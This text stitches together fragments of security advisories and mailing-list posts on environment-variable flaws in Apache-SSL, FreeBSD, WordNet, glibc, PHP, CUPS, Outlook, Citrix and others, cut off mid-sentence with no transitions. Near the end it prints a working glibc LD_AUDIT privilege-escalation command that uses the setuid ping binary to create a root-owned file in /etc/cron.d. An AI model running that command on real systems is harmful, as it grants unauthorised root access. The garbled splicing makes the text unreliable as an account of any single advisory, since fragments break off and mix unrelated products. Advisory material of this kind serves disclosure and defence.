environment variables
Apache-SSL is a secure Webserver, based on Apache and SSLeay/OpenSSL.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:
Apache-SSL provides environment variables that are filled with
(client) certificate data. If the subject of a client certificate
contains special characters, parts of these variables can be overwritten
or be filled with other parts of memory.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
load libraries via various LD_ environmental variables.
II. Problem Description
When running setuid programs rtld will normally remove potentially
dangerous environment variables. Due to recent changes in FreeBSD
environment variable handling code, a corrupt environment may
result in attempts to unset environment variables failing.
III. Impact
Description:
The WordNet 3.0 Unix library and command-line interface suffer from a
number of stack overflows due to their handling of command line
arguments, environment variables and data read from user supplied
dictionaries.
The oCERT team was contacted by Moritz Muehlenhoff from the Debian
project requesting an audit of the WordNet code base. These
vulnerabilities were the findings of the requested audit.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Tomboy doesn't properly handle environment variables, potentially
allowing a local attacker to execute arbitrary code.
Background
==========
stack-based buffer overflows.
* Rob Holland (oCERT) reported two boundary errors within the
do_init() function in lib/morph.c, which lead to stack-based buffer
overflows via specially crafted "WNSEARCHDIR" or "WNHOME" environment
variables.
* Rob Holland (oCERT) reported multiple boundary errors in the
bin_search() and bin_search_key() functions in binsrch.c, which lead
to stack-based buffer overflows via specially crafted data files.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Blam doesn't properly handle environment variables, potentially
allowing a local attacker to execute arbitrary code.
Background
==========
in the TELNET protocol, it is strongly recommended that the SSH protocol
be used instead. The FreeBSD telnet daemon can be enabled via the
/etc/inetd.conf configuration file and the inetd(8) daemon.
The TELNET protocol allows a connecting client to specify environment
variables which should be set in any created login session; this is used,
for example, to specify terminal settings.
II. Problem Description
In order to prevent environment variable based attacks, telnetd(8) "scrubs"
and 1.4.2_29 and earlier for Solaris and Linux allows local standalone
applications to affect confidentiality, integrity, and availability via
unknown vectors related to Launcher. NOTE: the previous information was
obtained from the February 2011 CPU. Oracle has not commented on claims
from a downstream vendor that this issue is an untrusted search path
vulnerability involving an empty LD_LIBRARY_PATH environment variable
(CVE-2010-4450).
Unspecified vulnerability in the Java Runtime Environment (JRE)
in Oracle Java SE and Java for Business 6 Update 23 and earlier,
5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote
Description
===========
Bernhard R. Link discovered that Eterm opens a terminal on :0 if the
"-display" option is not specified and the DISPLAY environment variable
is not set. Further research by the Gentoo Security Team has shown that
aterm, Mrxvt, multi-aterm, RXVT, rxvt-unicode, and wterm are also
affected.
Impact
any rate, they're in the Windows Ghostscript distribution I have
installed here.
The Windows scripts (gs*\lib\*.bat) are similarly vulnerable: no use of
-P-, and letting the executable name be overridden by an environment
variable.
--
Michael Wojcik
Principal Software Systems Developer, Micro Focus
before 5.2.11 and 5.3.x before 5.3.1 does not enforce the (1)
safe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars
directives, which allows context-dependent attackers to execute
programs with an arbitrary environment via the env parameter, as
demonstrated by a crafted value of the LD_LIBRARY_PATH environment
variable (CVE-2009-4018).
Intermittent segfaults occurred on x86_64 with the latest phpmyadmin
and with apache (#53735).
Additionally, some packages which require so, have been rebuilt and
Description
===========
Viesturs reported that the default configuration for Gentoo's init
script ("/etc/conf.d/firebird") sets the "ISC_PASSWORD" environment
variable when starting Firebird. It will be used when no password is
supplied by a client connecting as the "SYSDBA" user.
Impact
======
On Tue, May 08, 2012 at 12:24:52PM -0500, Derek Martin wrote:
> Henrik Erkkonen has discovered that, through clever manipulation of
> environment variables on the ssh command line, it is possible to
> circumvent rssh. As far as I can tell, there is no way to effect a
> root compromise, except of course if the root account is the one
> you're attempting to protect with rssh...
>
> This project is old, and I have no interest in continuing to maintain
> it.
Problem type : remote
Debian-specific: no
CVE ID : CVE-2011-3148 CVE-2011-3149
Kees Cook of the ChromeOS security team discovered a buffer overflow
in pam_env, a PAM module to set environment variables through the
PAM stack, which allowed the execution of arbitrary code. An additional
issue in argument parsing allows denial of service.
The oldstable distribution (lenny) is not affected.
The patch I submitted to the Apache group
1) by default makes use of the /dev/urandom device that is available
on most modern open systems OSes
2) allows the user to specify another seed source (such as /dev/random)
via an environment variable
3) prints a warning if it has to fall back to using time()
Users of Microsoft Windows or other target platforms that lack /dev/urandom
might want to improve on this approach with appropriate APIs such as
RtlGenRandom on Windows. Also, the patch provides no updates to the htpasswd
CVE Id(s) : CVE-2010-3847 CVE-2010-3856
Debian Bug : 600667
Ben Hawkes and Tavis Ormandy discovered that the dynamic loader in GNU
libc allows local users to gain root privileges using a crafted
LD_AUDIT environment variable.
For the stable distribution (lenny), this problem has been fixed in
version 2.7-18lenny6.
For the upcoming stable distribution (squeeze), this problem has been
(simple) Windows shortcut. If a user double clicks such a message,
Outlook will open the link provided by the PR_ATTACH_PATHNAME or
PR_ATTACH_LONG_PATHNAME MAPI property.
Setting PR_ATTACH_PATHNAME to cmd.exe causes Outlook to search the PATH
environment variable for an executable named cmd.exe. If such a file is
found, it will be executed. Normally this results in a command shell.
The path name can be set to anything that is supported by Windows,
including UNC names (e.g.
\\servername\sharename\executable.exe) but also URLs (e.g.
http://www.akitasecurity.nl/advisory/RunCalc.exe). For URLs, Outlook
incorrect fix for CVE-2011-4885 (CVE-2012-0830). Note: this was fixed
with php-5.3.10
PHP before 5.3.10 does not properly perform a temporary change
to the magic_quotes_gpc directive during the importing of
environment variables, which makes it easier for remote attackers
to conduct SQL injection attacks via a crafted request, related to
main/php_variables.c, sapi/cgi/cgi_main.c, and sapi/fpm/fpm/fpm_main.c
(CVE-2012-0831).
Insufficient validating of upload name leading to corrupted $_FILES
Explanation of the code:
»argv[1]«, the first command line argument, is compared with the string
»estasklight«. If it is equal, the »auth« flag is set.
If the user has the environment variable »ES_LIBRARY_PATH« set, its value is
copied to two new environment variables, »LD_LIBRARY_PATH« and »LIBPATH«.
If the »auth« flag is set, the application »estasklight« is executed.
scripting (XSS) attacks and HTTP response splitting attacks via vectors
related to (a) the product's web interface, (b) the configuration of
the print system, and (c) the titles of printed jobs (CVE-2009-2820).
The _cupsGetlang function, as used by lppasswd.c in lppasswd in CUPS
1.2.2, 1.3.7, 1.3.9, and 1.4.1, relies on an environment variable
to determine the file that provides localized message strings, which
allows local users to gain privileges via a file that contains crafted
localization data with format string specifiers (CVE-2010-0393).
The updated packages have been patched to correct these issues.
but I don't own a domain:( I tried to attach ZIP archive, but it seems
it's being filtered.
Exploit code is a bit bloated, but because of the code repetition and
redundancy, I decided to aggregate it together in a small application.
Boost library is required for project compilation (read from BOOST
environment variable).
DISCLOSURE TIMELINE:
---------------
2 Feb 2010: Discovery of vulnerabilities
Problem Description:
A vulnerability has been found and corrected in fcgi:
The FCGI (aka Fast CGI) module 0.70 through 0.73 for Perl, as used by
CGI::Fast, uses environment variable values from one request during
processing of a later request, which allows remote attackers to bypass
authentication via crafted HTTP headers (CVE-2011-2766).
The updated packages have been patched to correct this issue.
_______________________________________________________________________
a reference count. NOTE: some of these details are obtained from
third party information. NOTE: this vulnerability exists because of
an incomplete fix for CVE-2009-3553 (CVE-2010-0302).
privilege escalations. Default Ubuntu installations were not affected.
Original advisory details:
Tavis Ormandy discovered multiple flaws in the GNU C Library's handling
of the LD_AUDIT environment variable when running a privileged binary. A
local attacker could exploit this to gain root privileges. (CVE-2010-3847,
CVE-2010-3856)
Updated packages for Ubuntu 8.04 LTS:
When the server receives an HTTP request for a real CGI (for example
webmail.exe) it uses a buffer of about 20000 bytes for storing
all the environment strings which will be passed to the called program.
The HTTP fields passed by the client in its request are truncated at
200 bytes for the parameter and 800 for its value and are added as
environment variables (HTTP_parameter=value).
The lack of checks on the size of this environment buffer leads to a
buffer overflow; although it is possible to control some registers,
code execution is not certain.
Naturally both the surgemail and the swatch (port 7027) processes are
> 1. The directory from which the application loaded
> 2. 32-bit System directory (Windows\System32)
> 3. 16-bit System directory (Windows\System)
> 4. Windows directory (Windows)
> 5. Current working directory
> 6. Directories in the PATH environment variable
> As OracleOciLib is not used on target system, oci.dll does not
> exist, so if a full path is not supplied when calling the dll
> or the search path has not been cleared before the call, we
> will hit our fifth search path and load the library from the
> remote filesystem.
The dba_replace function in PHP 5.2.6 and 4.x allows context-dependent
attackers to cause a denial of service (file truncation) via a key with
the NULL byte. NOTE: this might only be a vulnerability in limited
circumstances in which the attacker can modify or add database entries
$ ls -l /lib/libpcprofile.so
-rw-r--r-- 1 root root 5496 2010-10-12 03:32 /lib/libpcprofile.so
# We identified one of the pcprofile constructors is unsafe to run with
# elevated privileges, as it creates the file specified in the output
# environment variable.
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
privilege in Windows NT, 2000 in the default configuration and in
Windows 2003 in some circumstances.
This causes several instances of Windows PATH trolling, where Windows
tries to locate the icabar.exe file in the directories listed in its
PATH environment variable. If the attacker is able to write to any of
the directories listed in the PATH before the Citrix Metaframe PATH
entry, the attacker can escalate privilege.
The standard file ACL (Access Control List) of the Windows NT and 2000
operating systems is weak and allows any user to create files in the